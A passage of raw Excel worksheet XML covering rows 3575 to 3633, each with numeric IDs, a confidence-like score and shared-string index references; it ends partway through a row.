    <row r="3575" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3575" s="1">
        <v>3573</v>
      </c>
      <c r="B3575">
        <v>4381</v>
      </c>
      <c r="C3575">
        <v>4381</v>
      </c>
      <c r="D3575">
        <v>2</v>
      </c>
      <c r="E3575">
        <v>0.9868999719619751</v>
      </c>
      <c r="F3575" t="s">
        <v>5592</v>
      </c>
      <c r="G3575" t="s">
        <v>7069</v>
      </c>
      <c r="H3575" t="s">
        <v>7070</v>
      </c>
    </row>
    <row r="3576" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3576" s="1">
        <v>3574</v>
      </c>
      <c r="B3576">
        <v>4382</v>
      </c>
      <c r="C3576">
        <v>4382</v>
      </c>
      <c r="D3576">
        <v>2</v>
      </c>
      <c r="E3576">
        <v>0.99659997224807739</v>
      </c>
      <c r="F3576" t="s">
        <v>5592</v>
      </c>
      <c r="G3576" t="s">
        <v>7071</v>
      </c>
      <c r="H3576" t="s">
        <v>7072</v>
      </c>
    </row>
    <row r="3577" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3577" s="1">
        <v>3575</v>
      </c>
      <c r="B3577">
        <v>4383</v>
      </c>
      <c r="C3577">
        <v>4383</v>
      </c>
      <c r="D3577">
        <v>2</v>
      </c>
      <c r="E3577">
        <v>0.9976000189781189</v>
      </c>
      <c r="F3577" t="s">
        <v>5592</v>
      </c>
      <c r="G3577" t="s">
        <v>7073</v>
      </c>
      <c r="H3577" t="s">
        <v>7074</v>
      </c>
    </row>
    <row r="3578" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3578" s="1">
        <v>3576</v>
      </c>
      <c r="B3578">
        <v>4384</v>
      </c>
      <c r="C3578">
        <v>4384</v>
      </c>
      <c r="D3578">
        <v>2</v>
      </c>
      <c r="E3578">
        <v>0.99720001220703125</v>
      </c>
      <c r="F3578" t="s">
        <v>5592</v>
      </c>
      <c r="G3578" t="s">
        <v>7075</v>
      </c>
      <c r="H3578" t="s">
        <v>7076</v>
      </c>
    </row>
    <row r="3579" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3579" s="1">
        <v>3577</v>
      </c>
      <c r="B3579">
        <v>4385</v>
      </c>
      <c r="C3579">
        <v>4385</v>
      </c>
      <c r="D3579">
        <v>2</v>
      </c>
      <c r="E3579">
        <v>0.99049997329711914</v>
      </c>
      <c r="F3579" t="s">
        <v>5592</v>
      </c>
      <c r="G3579" t="s">
        <v>7077</v>
      </c>
      <c r="H3579" t="s">
        <v>7078</v>
      </c>
    </row>
    <row r="3580" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3580" s="1">
        <v>3578</v>
      </c>
      <c r="B3580">
        <v>4386</v>
      </c>
      <c r="C3580">
        <v>4386</v>
      </c>
      <c r="D3580">
        <v>2</v>
      </c>
      <c r="E3580">
        <v>0.99830001592636108</v>
      </c>
      <c r="F3580" t="s">
        <v>5592</v>
      </c>
      <c r="G3580" t="s">
        <v>7079</v>
      </c>
      <c r="H3580" t="s">
        <v>7080</v>
      </c>
    </row>
    <row r="3581" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3581" s="1">
        <v>3579</v>
      </c>
      <c r="B3581">
        <v>6056</v>
      </c>
      <c r="C3581">
        <v>6056</v>
      </c>
      <c r="D3581">
        <v>2</v>
      </c>
      <c r="E3581">
        <v>0.91600000858306885</v>
      </c>
      <c r="F3581" t="s">
        <v>5592</v>
      </c>
      <c r="G3581" t="s">
        <v>7081</v>
      </c>
      <c r="H3581" t="s">
        <v>7082</v>
      </c>
    </row>
    <row r="3582" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3582" s="1">
        <v>3580</v>
      </c>
      <c r="B3582">
        <v>4193</v>
      </c>
      <c r="C3582">
        <v>4193</v>
      </c>
      <c r="D3582">
        <v>2</v>
      </c>
      <c r="E3582">
        <v>0.99699997901916504</v>
      </c>
      <c r="F3582" t="s">
        <v>5592</v>
      </c>
      <c r="G3582" t="s">
        <v>7083</v>
      </c>
      <c r="H3582" t="s">
        <v>7084</v>
      </c>
    </row>
    <row r="3583" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3583" s="1">
        <v>3581</v>
      </c>
      <c r="B3583">
        <v>6099</v>
      </c>
      <c r="C3583">
        <v>6099</v>
      </c>
      <c r="D3583">
        <v>2</v>
      </c>
      <c r="E3583">
        <v>0.57849997282028198</v>
      </c>
      <c r="F3583" t="s">
        <v>5592</v>
      </c>
      <c r="G3583" t="s">
        <v>7085</v>
      </c>
      <c r="H3583" t="s">
        <v>7086</v>
      </c>
    </row>
    <row r="3584" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3584" s="1">
        <v>3582</v>
      </c>
      <c r="B3584">
        <v>6102</v>
      </c>
      <c r="C3584">
        <v>6102</v>
      </c>
      <c r="D3584">
        <v>2</v>
      </c>
      <c r="E3584">
        <v>0.98589998483657837</v>
      </c>
      <c r="F3584" t="s">
        <v>5592</v>
      </c>
      <c r="G3584" t="s">
        <v>7087</v>
      </c>
      <c r="H3584" t="s">
        <v>7088</v>
      </c>
    </row>
    <row r="3585" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3585" s="1">
        <v>3583</v>
      </c>
      <c r="B3585">
        <v>4218</v>
      </c>
      <c r="C3585">
        <v>4218</v>
      </c>
      <c r="D3585">
        <v>2</v>
      </c>
      <c r="E3585">
        <v>0.49950000643730158</v>
      </c>
      <c r="F3585" t="s">
        <v>5592</v>
      </c>
      <c r="G3585" t="s">
        <v>7089</v>
      </c>
      <c r="H3585" t="s">
        <v>7090</v>
      </c>
    </row>
    <row r="3586" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3586" s="1">
        <v>3584</v>
      </c>
      <c r="B3586">
        <v>4219</v>
      </c>
      <c r="C3586">
        <v>4219</v>
      </c>
      <c r="D3586">
        <v>2</v>
      </c>
      <c r="E3586">
        <v>0.58869999647140503</v>
      </c>
      <c r="F3586" t="s">
        <v>5592</v>
      </c>
      <c r="G3586" t="s">
        <v>7091</v>
      </c>
      <c r="H3586" t="s">
        <v>7092</v>
      </c>
    </row>
    <row r="3587" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3587" s="1">
        <v>3585</v>
      </c>
      <c r="B3587">
        <v>5267</v>
      </c>
      <c r="C3587">
        <v>5267</v>
      </c>
      <c r="D3587">
        <v>2</v>
      </c>
      <c r="E3587">
        <v>0.99589997529983521</v>
      </c>
      <c r="F3587" t="s">
        <v>5592</v>
      </c>
      <c r="G3587" t="s">
        <v>7093</v>
      </c>
      <c r="H3587" t="s">
        <v>7094</v>
      </c>
    </row>
    <row r="3588" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3588" s="1">
        <v>3586</v>
      </c>
      <c r="B3588">
        <v>4221</v>
      </c>
      <c r="C3588">
        <v>4221</v>
      </c>
      <c r="D3588">
        <v>2</v>
      </c>
      <c r="E3588">
        <v>0.44870001077651978</v>
      </c>
      <c r="F3588" t="s">
        <v>5592</v>
      </c>
      <c r="G3588" t="s">
        <v>7095</v>
      </c>
      <c r="H3588" t="s">
        <v>7096</v>
      </c>
    </row>
    <row r="3589" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3589" s="1">
        <v>3587</v>
      </c>
      <c r="B3589">
        <v>5263</v>
      </c>
      <c r="C3589">
        <v>5263</v>
      </c>
      <c r="D3589">
        <v>2</v>
      </c>
      <c r="E3589">
        <v>0.99819999933242798</v>
      </c>
      <c r="F3589" t="s">
        <v>5592</v>
      </c>
      <c r="G3589" t="s">
        <v>7097</v>
      </c>
      <c r="H3589" t="s">
        <v>7098</v>
      </c>
    </row>
    <row r="3590" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3590" s="1">
        <v>3588</v>
      </c>
      <c r="B3590">
        <v>5262</v>
      </c>
      <c r="C3590">
        <v>5262</v>
      </c>
      <c r="D3590">
        <v>2</v>
      </c>
      <c r="E3590">
        <v>0.97000002861022949</v>
      </c>
      <c r="F3590" t="s">
        <v>5592</v>
      </c>
      <c r="G3590" t="s">
        <v>7099</v>
      </c>
      <c r="H3590" t="s">
        <v>7100</v>
      </c>
    </row>
    <row r="3591" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3591" s="1">
        <v>3589</v>
      </c>
      <c r="B3591">
        <v>6151</v>
      </c>
      <c r="C3591">
        <v>6151</v>
      </c>
      <c r="D3591">
        <v>2</v>
      </c>
      <c r="E3591">
        <v>0.62970000505447388</v>
      </c>
      <c r="F3591" t="s">
        <v>5592</v>
      </c>
      <c r="G3591" t="s">
        <v>7101</v>
      </c>
      <c r="H3591" t="s">
        <v>7102</v>
      </c>
    </row>
    <row r="3592" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3592" s="1">
        <v>3590</v>
      </c>
      <c r="B3592">
        <v>4226</v>
      </c>
      <c r="C3592">
        <v>4226</v>
      </c>
      <c r="D3592">
        <v>2</v>
      </c>
      <c r="E3592">
        <v>0.4950999915599823</v>
      </c>
      <c r="F3592" t="s">
        <v>5592</v>
      </c>
      <c r="G3592" t="s">
        <v>7103</v>
      </c>
      <c r="H3592" t="s">
        <v>7104</v>
      </c>
    </row>
    <row r="3593" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3593" s="1">
        <v>3591</v>
      </c>
      <c r="B3593">
        <v>4227</v>
      </c>
      <c r="C3593">
        <v>4227</v>
      </c>
      <c r="D3593">
        <v>2</v>
      </c>
      <c r="E3593">
        <v>0.830299973487854</v>
      </c>
      <c r="F3593" t="s">
        <v>5592</v>
      </c>
      <c r="G3593" t="s">
        <v>7105</v>
      </c>
      <c r="H3593" t="s">
        <v>7106</v>
      </c>
    </row>
    <row r="3594" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3594" s="1">
        <v>3592</v>
      </c>
      <c r="B3594">
        <v>4228</v>
      </c>
      <c r="C3594">
        <v>4228</v>
      </c>
      <c r="D3594">
        <v>2</v>
      </c>
      <c r="E3594">
        <v>0.53189998865127563</v>
      </c>
      <c r="F3594" t="s">
        <v>5592</v>
      </c>
      <c r="G3594" t="s">
        <v>7107</v>
      </c>
      <c r="H3594" t="s">
        <v>7108</v>
      </c>
    </row>
    <row r="3595" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3595" s="1">
        <v>3593</v>
      </c>
      <c r="B3595">
        <v>4229</v>
      </c>
      <c r="C3595">
        <v>4229</v>
      </c>
      <c r="D3595">
        <v>2</v>
      </c>
      <c r="E3595">
        <v>0.53200000524520874</v>
      </c>
      <c r="F3595" t="s">
        <v>5592</v>
      </c>
      <c r="G3595" t="s">
        <v>7109</v>
      </c>
      <c r="H3595" t="s">
        <v>7108</v>
      </c>
    </row>
    <row r="3596" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3596" s="1">
        <v>3594</v>
      </c>
      <c r="B3596">
        <v>6147</v>
      </c>
      <c r="C3596">
        <v>6147</v>
      </c>
      <c r="D3596">
        <v>2</v>
      </c>
      <c r="E3596">
        <v>0.71469998359680176</v>
      </c>
      <c r="F3596" t="s">
        <v>5592</v>
      </c>
      <c r="G3596" t="s">
        <v>7110</v>
      </c>
      <c r="H3596" t="s">
        <v>7111</v>
      </c>
    </row>
    <row r="3597" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3597" s="1">
        <v>3595</v>
      </c>
      <c r="B3597">
        <v>4232</v>
      </c>
      <c r="C3597">
        <v>4232</v>
      </c>
      <c r="D3597">
        <v>2</v>
      </c>
      <c r="E3597">
        <v>0.91990000009536743</v>
      </c>
      <c r="F3597" t="s">
        <v>5592</v>
      </c>
      <c r="G3597" t="s">
        <v>7112</v>
      </c>
      <c r="H3597" t="s">
        <v>7113</v>
      </c>
    </row>
    <row r="3598" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3598" s="1">
        <v>3596</v>
      </c>
      <c r="B3598">
        <v>4233</v>
      </c>
      <c r="C3598">
        <v>4233</v>
      </c>
      <c r="D3598">
        <v>2</v>
      </c>
      <c r="E3598">
        <v>0.67280000448226929</v>
      </c>
      <c r="F3598" t="s">
        <v>5592</v>
      </c>
      <c r="G3598" t="s">
        <v>7114</v>
      </c>
      <c r="H3598" t="s">
        <v>7115</v>
      </c>
    </row>
    <row r="3599" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3599" s="1">
        <v>3597</v>
      </c>
      <c r="B3599">
        <v>4234</v>
      </c>
      <c r="C3599">
        <v>4234</v>
      </c>
      <c r="D3599">
        <v>2</v>
      </c>
      <c r="E3599">
        <v>0.60199999809265137</v>
      </c>
      <c r="F3599" t="s">
        <v>5592</v>
      </c>
      <c r="G3599" t="s">
        <v>7116</v>
      </c>
      <c r="H3599" t="s">
        <v>7117</v>
      </c>
    </row>
    <row r="3600" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3600" s="1">
        <v>3598</v>
      </c>
      <c r="B3600">
        <v>4216</v>
      </c>
      <c r="C3600">
        <v>4216</v>
      </c>
      <c r="D3600">
        <v>2</v>
      </c>
      <c r="E3600">
        <v>0.85799998044967651</v>
      </c>
      <c r="F3600" t="s">
        <v>5592</v>
      </c>
      <c r="G3600" t="s">
        <v>7118</v>
      </c>
      <c r="H3600" t="s">
        <v>7119</v>
      </c>
    </row>
    <row r="3601" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3601" s="1">
        <v>3599</v>
      </c>
      <c r="B3601">
        <v>5268</v>
      </c>
      <c r="C3601">
        <v>5268</v>
      </c>
      <c r="D3601">
        <v>2</v>
      </c>
      <c r="E3601">
        <v>0.61710000038146973</v>
      </c>
      <c r="F3601" t="s">
        <v>5592</v>
      </c>
      <c r="G3601" t="s">
        <v>7120</v>
      </c>
      <c r="H3601" t="s">
        <v>7121</v>
      </c>
    </row>
    <row r="3602" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3602" s="1">
        <v>3600</v>
      </c>
      <c r="B3602">
        <v>4214</v>
      </c>
      <c r="C3602">
        <v>4214</v>
      </c>
      <c r="D3602">
        <v>2</v>
      </c>
      <c r="E3602">
        <v>0.56870001554489136</v>
      </c>
      <c r="F3602" t="s">
        <v>5592</v>
      </c>
      <c r="G3602" t="s">
        <v>7122</v>
      </c>
      <c r="H3602" t="s">
        <v>7123</v>
      </c>
    </row>
    <row r="3603" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3603" s="1">
        <v>3601</v>
      </c>
      <c r="B3603">
        <v>6153</v>
      </c>
      <c r="C3603">
        <v>6153</v>
      </c>
      <c r="D3603">
        <v>2</v>
      </c>
      <c r="E3603">
        <v>0.71670001745223999</v>
      </c>
      <c r="F3603" t="s">
        <v>5592</v>
      </c>
      <c r="G3603" t="s">
        <v>7124</v>
      </c>
      <c r="H3603" t="s">
        <v>7125</v>
      </c>
    </row>
    <row r="3604" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3604" s="1">
        <v>3602</v>
      </c>
      <c r="B3604">
        <v>4194</v>
      </c>
      <c r="C3604">
        <v>4194</v>
      </c>
      <c r="D3604">
        <v>2</v>
      </c>
      <c r="E3604">
        <v>0.42879998683929438</v>
      </c>
      <c r="F3604" t="s">
        <v>5592</v>
      </c>
      <c r="G3604" t="s">
        <v>7126</v>
      </c>
      <c r="H3604" t="s">
        <v>7127</v>
      </c>
    </row>
    <row r="3605" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3605" s="1">
        <v>3603</v>
      </c>
      <c r="B3605">
        <v>5275</v>
      </c>
      <c r="C3605">
        <v>5275</v>
      </c>
      <c r="D3605">
        <v>2</v>
      </c>
      <c r="E3605">
        <v>0.9968000054359436</v>
      </c>
      <c r="F3605" t="s">
        <v>5592</v>
      </c>
      <c r="G3605" t="s">
        <v>7128</v>
      </c>
      <c r="H3605" t="s">
        <v>7129</v>
      </c>
    </row>
    <row r="3606" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3606" s="1">
        <v>3604</v>
      </c>
      <c r="B3606">
        <v>4195</v>
      </c>
      <c r="C3606">
        <v>4195</v>
      </c>
      <c r="D3606">
        <v>2</v>
      </c>
      <c r="E3606">
        <v>0.53270000219345093</v>
      </c>
      <c r="F3606" t="s">
        <v>5592</v>
      </c>
      <c r="G3606" t="s">
        <v>7130</v>
      </c>
      <c r="H3606" t="s">
        <v>7131</v>
      </c>
    </row>
    <row r="3607" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3607" s="1">
        <v>3605</v>
      </c>
      <c r="B3607">
        <v>6161</v>
      </c>
      <c r="C3607">
        <v>6161</v>
      </c>
      <c r="D3607">
        <v>2</v>
      </c>
      <c r="E3607">
        <v>0.88590002059936523</v>
      </c>
      <c r="F3607" t="s">
        <v>5592</v>
      </c>
      <c r="G3607" t="s">
        <v>7132</v>
      </c>
      <c r="H3607" t="s">
        <v>7133</v>
      </c>
    </row>
    <row r="3608" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3608" s="1">
        <v>3606</v>
      </c>
      <c r="B3608">
        <v>5274</v>
      </c>
      <c r="C3608">
        <v>5274</v>
      </c>
      <c r="D3608">
        <v>2</v>
      </c>
      <c r="E3608">
        <v>0.99750000238418579</v>
      </c>
      <c r="F3608" t="s">
        <v>5592</v>
      </c>
      <c r="G3608" t="s">
        <v>7134</v>
      </c>
      <c r="H3608" t="s">
        <v>7135</v>
      </c>
    </row>
    <row r="3609" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3609" s="1">
        <v>3607</v>
      </c>
      <c r="B3609">
        <v>6160</v>
      </c>
      <c r="C3609">
        <v>6160</v>
      </c>
      <c r="D3609">
        <v>2</v>
      </c>
      <c r="E3609">
        <v>0.66900002956390381</v>
      </c>
      <c r="F3609" t="s">
        <v>5592</v>
      </c>
      <c r="G3609" t="s">
        <v>7136</v>
      </c>
      <c r="H3609" t="s">
        <v>7137</v>
      </c>
    </row>
    <row r="3610" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3610" s="1">
        <v>3608</v>
      </c>
      <c r="B3610">
        <v>6159</v>
      </c>
      <c r="C3610">
        <v>6159</v>
      </c>
      <c r="D3610">
        <v>2</v>
      </c>
      <c r="E3610">
        <v>0.80800002813339233</v>
      </c>
      <c r="F3610" t="s">
        <v>5592</v>
      </c>
      <c r="G3610" t="s">
        <v>7138</v>
      </c>
      <c r="H3610" t="s">
        <v>7139</v>
      </c>
    </row>
    <row r="3611" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3611" s="1">
        <v>3609</v>
      </c>
      <c r="B3611">
        <v>6146</v>
      </c>
      <c r="C3611">
        <v>6146</v>
      </c>
      <c r="D3611">
        <v>2</v>
      </c>
      <c r="E3611">
        <v>0.70139998197555542</v>
      </c>
      <c r="F3611" t="s">
        <v>5592</v>
      </c>
      <c r="G3611" t="s">
        <v>7140</v>
      </c>
      <c r="H3611" t="s">
        <v>7141</v>
      </c>
    </row>
    <row r="3612" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3612" s="1">
        <v>3610</v>
      </c>
      <c r="B3612">
        <v>6158</v>
      </c>
      <c r="C3612">
        <v>6158</v>
      </c>
      <c r="D3612">
        <v>2</v>
      </c>
      <c r="E3612">
        <v>0.31990000605583191</v>
      </c>
      <c r="F3612" t="s">
        <v>5592</v>
      </c>
      <c r="G3612" t="s">
        <v>7142</v>
      </c>
      <c r="H3612" t="s">
        <v>7143</v>
      </c>
    </row>
    <row r="3613" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3613" s="1">
        <v>3611</v>
      </c>
      <c r="B3613">
        <v>5273</v>
      </c>
      <c r="C3613">
        <v>5273</v>
      </c>
      <c r="D3613">
        <v>2</v>
      </c>
      <c r="E3613">
        <v>0.98760002851486206</v>
      </c>
      <c r="F3613" t="s">
        <v>5592</v>
      </c>
      <c r="G3613" t="s">
        <v>7144</v>
      </c>
      <c r="H3613" t="s">
        <v>7145</v>
      </c>
    </row>
    <row r="3614" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3614" s="1">
        <v>3612</v>
      </c>
      <c r="B3614">
        <v>5272</v>
      </c>
      <c r="C3614">
        <v>5272</v>
      </c>
      <c r="D3614">
        <v>2</v>
      </c>
      <c r="E3614">
        <v>0.99959999322891235</v>
      </c>
      <c r="F3614" t="s">
        <v>5592</v>
      </c>
      <c r="G3614" t="s">
        <v>7146</v>
      </c>
      <c r="H3614" t="s">
        <v>7147</v>
      </c>
    </row>
    <row r="3615" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3615" s="1">
        <v>3613</v>
      </c>
      <c r="B3615">
        <v>5271</v>
      </c>
      <c r="C3615">
        <v>5271</v>
      </c>
      <c r="D3615">
        <v>2</v>
      </c>
      <c r="E3615">
        <v>0.75389999151229858</v>
      </c>
      <c r="F3615" t="s">
        <v>5592</v>
      </c>
      <c r="G3615" t="s">
        <v>7148</v>
      </c>
      <c r="H3615" t="s">
        <v>7149</v>
      </c>
    </row>
    <row r="3616" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3616" s="1">
        <v>3614</v>
      </c>
      <c r="B3616">
        <v>5270</v>
      </c>
      <c r="C3616">
        <v>5270</v>
      </c>
      <c r="D3616">
        <v>2</v>
      </c>
      <c r="E3616">
        <v>0.9968000054359436</v>
      </c>
      <c r="F3616" t="s">
        <v>5592</v>
      </c>
      <c r="G3616" t="s">
        <v>7150</v>
      </c>
      <c r="H3616" t="s">
        <v>7151</v>
      </c>
    </row>
    <row r="3617" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3617" s="1">
        <v>3615</v>
      </c>
      <c r="B3617">
        <v>4210</v>
      </c>
      <c r="C3617">
        <v>4210</v>
      </c>
      <c r="D3617">
        <v>2</v>
      </c>
      <c r="E3617">
        <v>0.991100013256073</v>
      </c>
      <c r="F3617" t="s">
        <v>5592</v>
      </c>
      <c r="G3617" t="s">
        <v>7152</v>
      </c>
      <c r="H3617" t="s">
        <v>7153</v>
      </c>
    </row>
    <row r="3618" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3618" s="1">
        <v>3616</v>
      </c>
      <c r="B3618">
        <v>5269</v>
      </c>
      <c r="C3618">
        <v>5269</v>
      </c>
      <c r="D3618">
        <v>2</v>
      </c>
      <c r="E3618">
        <v>0.56080001592636108</v>
      </c>
      <c r="F3618" t="s">
        <v>5592</v>
      </c>
      <c r="G3618" t="s">
        <v>7154</v>
      </c>
      <c r="H3618" t="s">
        <v>7155</v>
      </c>
    </row>
    <row r="3619" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3619" s="1">
        <v>3617</v>
      </c>
      <c r="B3619">
        <v>4212</v>
      </c>
      <c r="C3619">
        <v>4212</v>
      </c>
      <c r="D3619">
        <v>2</v>
      </c>
      <c r="E3619">
        <v>0.78339999914169312</v>
      </c>
      <c r="F3619" t="s">
        <v>5592</v>
      </c>
      <c r="G3619" t="s">
        <v>7156</v>
      </c>
      <c r="H3619" t="s">
        <v>7157</v>
      </c>
    </row>
    <row r="3620" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3620" s="1">
        <v>3618</v>
      </c>
      <c r="B3620">
        <v>4205</v>
      </c>
      <c r="C3620">
        <v>4205</v>
      </c>
      <c r="D3620">
        <v>2</v>
      </c>
      <c r="E3620">
        <v>0.58740001916885376</v>
      </c>
      <c r="F3620" t="s">
        <v>5592</v>
      </c>
      <c r="G3620" t="s">
        <v>7158</v>
      </c>
      <c r="H3620" t="s">
        <v>7159</v>
      </c>
    </row>
    <row r="3621" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3621" s="1">
        <v>3619</v>
      </c>
      <c r="B3621">
        <v>6145</v>
      </c>
      <c r="C3621">
        <v>6145</v>
      </c>
      <c r="D3621">
        <v>2</v>
      </c>
      <c r="E3621">
        <v>0.55809998512268066</v>
      </c>
      <c r="F3621" t="s">
        <v>5592</v>
      </c>
      <c r="G3621" t="s">
        <v>7160</v>
      </c>
      <c r="H3621" t="s">
        <v>7161</v>
      </c>
    </row>
    <row r="3622" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3622" s="1">
        <v>3620</v>
      </c>
      <c r="B3622">
        <v>4239</v>
      </c>
      <c r="C3622">
        <v>4239</v>
      </c>
      <c r="D3622">
        <v>2</v>
      </c>
      <c r="E3622">
        <v>0.99269998073577881</v>
      </c>
      <c r="F3622" t="s">
        <v>5592</v>
      </c>
      <c r="G3622" t="s">
        <v>7162</v>
      </c>
      <c r="H3622" t="s">
        <v>7163</v>
      </c>
    </row>
    <row r="3623" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3623" s="1">
        <v>3621</v>
      </c>
      <c r="B3623">
        <v>5256</v>
      </c>
      <c r="C3623">
        <v>5256</v>
      </c>
      <c r="D3623">
        <v>2</v>
      </c>
      <c r="E3623">
        <v>0.7062000036239624</v>
      </c>
      <c r="F3623" t="s">
        <v>5592</v>
      </c>
      <c r="G3623" t="s">
        <v>7164</v>
      </c>
      <c r="H3623" t="s">
        <v>7165</v>
      </c>
    </row>
    <row r="3624" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3624" s="1">
        <v>3622</v>
      </c>
      <c r="B3624">
        <v>6112</v>
      </c>
      <c r="C3624">
        <v>6112</v>
      </c>
      <c r="D3624">
        <v>2</v>
      </c>
      <c r="E3624">
        <v>0.95660001039505005</v>
      </c>
      <c r="F3624" t="s">
        <v>5592</v>
      </c>
      <c r="G3624" t="s">
        <v>7166</v>
      </c>
      <c r="H3624" t="s">
        <v>7167</v>
      </c>
    </row>
    <row r="3625" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3625" s="1">
        <v>3623</v>
      </c>
      <c r="B3625">
        <v>6110</v>
      </c>
      <c r="C3625">
        <v>6110</v>
      </c>
      <c r="D3625">
        <v>2</v>
      </c>
      <c r="E3625">
        <v>0.99860000610351563</v>
      </c>
      <c r="F3625" t="s">
        <v>5592</v>
      </c>
      <c r="G3625" t="s">
        <v>7168</v>
      </c>
      <c r="H3625" t="s">
        <v>7169</v>
      </c>
    </row>
    <row r="3626" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3626" s="1">
        <v>3624</v>
      </c>
      <c r="B3626">
        <v>4281</v>
      </c>
      <c r="C3626">
        <v>4281</v>
      </c>
      <c r="D3626">
        <v>2</v>
      </c>
      <c r="E3626">
        <v>0.76789999008178711</v>
      </c>
      <c r="F3626" t="s">
        <v>5592</v>
      </c>
      <c r="G3626" t="s">
        <v>7170</v>
      </c>
      <c r="H3626" t="s">
        <v>7171</v>
      </c>
    </row>
    <row r="3627" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3627" s="1">
        <v>3625</v>
      </c>
      <c r="B3627">
        <v>4282</v>
      </c>
      <c r="C3627">
        <v>4282</v>
      </c>
      <c r="D3627">
        <v>2</v>
      </c>
      <c r="E3627">
        <v>0.42550000548362732</v>
      </c>
      <c r="F3627" t="s">
        <v>5592</v>
      </c>
      <c r="G3627" t="s">
        <v>7172</v>
      </c>
      <c r="H3627" t="s">
        <v>7173</v>
      </c>
    </row>
    <row r="3628" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3628" s="1">
        <v>3626</v>
      </c>
      <c r="B3628">
        <v>4283</v>
      </c>
      <c r="C3628">
        <v>4283</v>
      </c>
      <c r="D3628">
        <v>2</v>
      </c>
      <c r="E3628">
        <v>0.51579999923706055</v>
      </c>
      <c r="F3628" t="s">
        <v>5592</v>
      </c>
      <c r="G3628" t="s">
        <v>7174</v>
      </c>
      <c r="H3628" t="s">
        <v>7175</v>
      </c>
    </row>
    <row r="3629" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3629" s="1">
        <v>3627</v>
      </c>
      <c r="B3629">
        <v>5237</v>
      </c>
      <c r="C3629">
        <v>5237</v>
      </c>
      <c r="D3629">
        <v>2</v>
      </c>
      <c r="E3629">
        <v>0.98309999704360962</v>
      </c>
      <c r="F3629" t="s">
        <v>5592</v>
      </c>
      <c r="G3629" t="s">
        <v>7176</v>
      </c>
      <c r="H3629" t="s">
        <v>7177</v>
      </c>
    </row>
    <row r="3630" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3630" s="1">
        <v>3628</v>
      </c>
      <c r="B3630">
        <v>6106</v>
      </c>
      <c r="C3630">
        <v>6106</v>
      </c>
      <c r="D3630">
        <v>2</v>
      </c>
      <c r="E3630">
        <v>0.99000000953674316</v>
      </c>
      <c r="F3630" t="s">
        <v>5592</v>
      </c>
      <c r="G3630" t="s">
        <v>7178</v>
      </c>
      <c r="H3630" t="s">
        <v>7179</v>
      </c>
    </row>
    <row r="3631" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3631" s="1">
        <v>3629</v>
      </c>
      <c r="B3631">
        <v>5240</v>
      </c>
      <c r="C3631">
        <v>5240</v>
      </c>
      <c r="D3631">
        <v>2</v>
      </c>
      <c r="E3631">
        <v>0.98629999160766602</v>
      </c>
      <c r="F3631" t="s">
        <v>5592</v>
      </c>
      <c r="G3631" t="s">
        <v>7180</v>
      </c>
      <c r="H3631" t="s">
        <v>7181</v>
      </c>
    </row>
    <row r="3632" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3632" s="1">
        <v>3630</v>
      </c>
      <c r="B3632">
        <v>5236</v>
      </c>
      <c r="C3632">
        <v>5236</v>
      </c>
      <c r="D3632">
        <v>2</v>
      </c>
      <c r="E3632">
        <v>0.99479997158050537</v>
      </c>
      <c r="F3632" t="s">
        <v>5592</v>
      </c>
      <c r="G3632" t="s">
        <v>7182</v>
      </c>
      <c r="H3632" t="s">
        <v>7183</v>
      </c>
    </row>
    <row r="3633" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3633" s="1">
        <v>3631</v>
      </c>
      <c r="B3633">
        <v>4291</v>
      </c>
      <c r="C3633">
